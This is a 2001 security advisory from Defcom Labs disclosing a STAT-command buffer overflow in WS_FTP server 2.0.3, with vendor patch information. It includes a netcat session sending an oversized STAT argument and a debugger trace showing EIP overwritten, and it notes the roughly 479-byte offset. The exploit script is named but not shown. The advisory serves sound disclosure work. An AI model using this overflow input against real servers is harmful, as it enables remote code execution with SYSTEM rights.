|
======================================================================
Defcom Labs Advisory def-2001-31
WS_FTP server 2.0.3 Buffer Overflow
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
The parsing code for the STAT command suffers from a buffer
overflow. By sending a STAT command followed by an argument greater
than 479 (475 bytes + new return address) bytes, a buffer will
overflow and the EIP will be overwritten. The overflow is dependant
on the size of the name of the server because the argument, the
servername and some more information is wsprint'ed together in the
buffer. A proof-of-concept exploit is attached to the advisory.
C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???
---------------------------=[Workaround]=-----------------------------
Download new version(2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 8th of
August, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com http://labs.defcom.com
======================================================================
|
